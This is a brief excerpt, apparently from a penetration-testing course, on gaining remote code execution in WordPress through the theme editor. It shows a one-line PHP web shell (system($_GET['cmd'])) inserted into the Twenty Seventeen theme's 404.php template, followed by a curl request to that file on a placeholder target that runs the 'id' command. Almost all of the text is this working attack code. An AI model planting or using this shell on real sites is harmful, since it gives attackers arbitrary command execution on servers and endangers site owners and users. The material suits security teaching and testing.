Remote Code Execution (RCE) via the Theme Editor
Attacking the WordPress Backend
<?php
system($_GET['cmd']);
/**
* The template for displaying 404 pages (not found)
*
* @link https://codex.wordpress.org/Creating_an_Error_404_Page
<SNIP>curl -X GET "http://<target>/wp-content/themes/twentyseventeen/404.php?cmd=id"Last updated